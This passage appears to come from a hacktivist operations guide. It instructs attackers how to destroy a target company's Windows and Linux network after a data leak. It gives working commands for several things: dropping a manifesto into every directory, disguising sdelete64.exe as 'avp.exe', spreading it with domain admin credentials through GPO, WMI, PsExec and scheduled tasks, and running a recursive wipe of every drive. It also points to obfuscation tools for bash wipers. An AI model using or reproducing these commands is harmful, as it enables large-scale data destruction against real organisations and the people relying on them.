Chaos and Destruction
Companies have large networks consisting of both Windows and Linux systems, so if your end goal is not only leaking data to journalists but to also destroy your target then using a wiper will be the best way to achieve this goal, just make sure not to wipe critical services that may impact someones physical safety as demonstrated in Guacamaya's HackBack video, we want to destroy data, not harm human life.
Print your manifesto
@echo off set "manifesto=C:\Users\Administrator\AppData\Local\Temp\manifesto.txt" for /r "C:\" %%d in (.) do ( xcopy "%manifesto%" "%%d\" /Y )
Wiping Windows Domain
When it comes time to destroy your targets network as demonstrated by the Hack Back video Guacamaya made it's best to use sdelete as it's a Microsoft developed and signed application removing the need to disable security controls before it's spread and execution. Below we showcase various different methods to weaponize sdelete64.exe application across the network of your target.
Method 1 - GPO & Schtasks
Using Group Policy Objects (GPO) and Scheduled tasks to spread sdelete64.exe across a domain
- Guacamaya (2:13:35 Wiping windows domain with sdelete on the domain controller)
sdelete64.exe -accepteula -r -s C:\*
Method 2 - WMI
Using batch files to spread sdelete64.exe utilizing Windows Management Instrumentation (WMI)
On the domain controller (DC) get a list of server names:
net view /all /domain
Running as the domain admin, on the domain controller (DC), copy the sdelete64.exe binary file to all servers in your list:
for /f %%i in (servers.txt) do copy "C:\Windows\Temp\sdelete64.exe" "\\%%i\C$\Windows\avp.exe"
Specify account credentials:
start wmic /node:"<COMPUTER>" /user:"Administrator" /password:"Passw0rd123!" process call create "cmd.exe /c copy \\SHARE\C$\Windows\Temp\sdelete64.exe C:\Windows\avp.exe"
Running as the domain admin now execute:
for /f %%i in (servers.txt) do wmic /node:%%i process call create "cmd.exe /c C:\Windows\avp.exe -accepteula -r -s C:\*"
Specify account credentials:
start wmic /node:"<COMPUTER>" /user:"Administrator" /password:"Passw0rd123!" process call create "cmd.exe /c C:\Windows\avp.exe -accepteula -r -s C:\*"
Method 3 - PsExec
Using PsExec to run sdelete64.exe across the network:
PsExec.exe -accepteula @C:\Windows\Temp\servers.txt -u DOMAIN\Administrator -p Passw0rd123! cmd /c copy "\\\C$\Windows\Temp\sdelete64.exe" "C:\Windows"
start PsExec.exe -d @:\\\C$\Windows\Temp\servers.txt -u DOMAIN\Administrator -p Passw0rd123! cmd /c C:\Windows\sdelete64.exe -accepteula -r -s C:\*
Method 4 - Schtasks
Using Windows scheduled tasks to execute sdelete64.exe on remote systems (also good for lateral movement):
Run as domain admin:
schtasks /s <COMPUTER> /create /tn wipe /tr C:\Windows\avp.exe -accepteula -r -s C:\* /ru SYSTEM /sc once /st 00:00
schtasks /s <COMPUTER> /run /tn wipe
Specify credentials:
schtasks /s <COMPUTER> /u Administrator /p Passw0rd123! /Create /tn wipe /tr C:\Windows\avp.exe -accepteula -r -s C:\* /ru SYSTEM /sc once /st 00:00
schtasks /s <COMPUTER> /u Administrator /p Passw0rd123! /run /tn wipe
Encrypt Windows Domain
Encrypt Windows Domain (1:24:16 Wiping windows domain with Bitlocker)
Print your manifesto
find ~/ -type d -exec cp -R /tmp/manifesto.txt {} \;
Wiping Linux System
After you have identified all of your targets internal Linux servers and are able to access them, you can utilize a bash wiper to destroy those servers whilst sdelete64.exe is destroying the Windows systems.
- Bash Wiper: (source)
- A Node.js CLI tool and library to heavily obfuscate bash scripts:
- Shell script compiler: